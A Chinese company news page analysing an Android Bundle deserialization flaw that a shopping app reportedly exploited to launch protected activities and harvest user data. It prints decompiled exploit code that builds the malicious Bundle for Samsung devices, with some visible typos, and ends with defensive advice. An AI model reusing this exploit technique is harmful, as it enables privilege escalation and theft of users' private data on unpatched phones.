![[众诚云网科技]](/uploads/allimg/20190305/c4b08346cbe8b0efae6b132139c2d72a.png)
新闻中心 
App 恶意提权,可随意窃取用户信息!!董明珠看上冰箱+储能,但这门生意在中国没有土壤协同办公的第二场硬仗:云智一体大尺寸面板价格已上涨,或将持续到第三季度以低代码平台切入医疗信息化,「福鑫科创」获5000万元天使轮融资美国交通部长称特斯拉Autopilot名不符实苹果A17续写性能新神话!安卓阵营集体被甩开了拍摄遭质疑!网友证明三星拍月亮存在“造假”《阿凡达2》斩获奥斯卡特效奖 AMD:我们的C
2023-09-26
浏览次数:次
返回列表3 月初有关于利用 Android 漏洞在发布的移动应用中植入恶意程序代码获取用户敏感信息和数据这一恶劣事件,严重危害用户隐私权益。
我司技术人员对该问题进行分析和研究如下:漏洞成因
和 Java 反序列化漏洞一样,Android 的序列化和反序列化也会被利用,由于在序列化阶段存储的 Key-Value,这导致在读取阶段如果数据没有被准确校验就会被构造的数据在反序列化阶段被利用。根据
https://xz.aliyun.com/t/2364#LaunchAnyWhere 文章的分析,可以知道在反序列化阶段的时候如果构造的 Bundle 对象中存储的是 {intent:myIntent},会被传递给系统应用 Settings,最终会被调用 startActivity ( intent ) ,如此就能实现任意 App 启动未导出等 activity。
相比于传统的 Java 的序列化实现接口 Serializable 不同,Android 的序列化实现的接口是 Parcelable 对象,这个接口用于在 Android 的通信 Intent 或者 Binder 进行传输数据。Android 的序列化对象需要通过 Bundle 来携带,传输是需要使用 Key-Value 的方式存储,其内部的实现是一个 Map,在获取数据时根据 Key 来取出对应的数值。
读取的时候通过对应的 Type 来读取这样就能通过序列化传输和反序列化来读取完成数据传递。App 分析
从上面的分析可以知道,对 PDD 分析是可以看到如下
程序在构造 Bundle 对象并通过 startSpecialActivity 等函数进行分发启动。这其中还通过实现 Autheniticator 来构造恶意的 Bundle 对象为了逃避静态分析,程序内使用了动态解密字符串和反射调用等方式构造调用链并在调用阶段通过配置文件来动态下发指令方式执行结合文章:https://github.com/davinci1010/pinduoduo_backdoor
// assets/component/com.xunmeng.pinduoduo.AliveBaseAbilitiy// [ Manwei ]
// com/xunmeng/pinduoduo/android_pull_ablity_comp/pullstartup/SamsungAlivePullStartup
Public static Bundle makeBundleForSamsungSinceP ( Intent intent ) {
Bundle bundle = new Bundle ( ) ;
Parcel obtain = Parcel.obtain ( ) ;
Parcel obtain2 = Parcel.obtain ( ) ;
Parcel obtain3 = Parcel.obtain ( ) ;
obtain2.writeInt ( 3 ) ;
obtain2.writeInt ( 13 ) ;
obtain2.writeInt ( 72 ) ;
obtain2.writeInt ( 0 ) ;
obtain2.writeInt ( 4 ) ;
obtain2.writeString ( "com.samsung.android.cepproxyks.CertByte" ) ;
byte b [ ] = new byte [ 0 ] ;
obtain2.writeByteArray ( b ) ;
obtain2.writeInt ( 53 ) ;
obtain2.writeInt ( 1 ) ;
obtain2.writeInt ( 48 ) ;
obtain2.writeInt ( -1 ) ;
int dataPosition = obtain2.dataPosition ( ) ;
obtain2.writeString ( "intent" ) ;
obtain2.writeString ( "android.content.Intent" ) ;
obtain2.writeToParcel ( obtain3, 0 ) ;
obtain2.appendFrom ( obtain3, 0, obtain3.dataSize ( ) ) ;
int dataPosition2 = obtain2.dataPosition ( ) ;
obtain2.setDataPosition ( dataPosition2 - 4 ) ;
obtain2.writeInit ( dataPosition2 -dataPosition ) ;
obtain2.setdataPosition ( dataPosition2 ) ;
int dataSize = obtain2.dataSize ( ) ;
obtain.writeInt ( dataSize ) ;
obtain.writeInt ( 1279544898 ) ;
obtain.appendFrom ( obtain2, 0, dataSize ) ;
obtain.setDataPosition ( 0 ) ;
bundle.readFromParcel ( obtain ) ;
return bundle;
}
漏洞影响范围
目前除了 google 更新的 Android13 对该漏洞修复外,可能有些厂商的手机并未修复此漏洞。
相关建议
1.APP 产品提供者安全开发上线进行源代码扫描,避免出现已知漏洞;
2. 手机厂商需要更重视自研代码的安全,削减不必要的、可能被攻击者利用的攻击面;
3. 监管机构需要针对此类行为进行治理,根据现有法律法规严格执法、监管,严肃问责,以推进、构建一个更安全的数字环境;
4. 手机用户及时升级系统版本,使用主流厂商手机
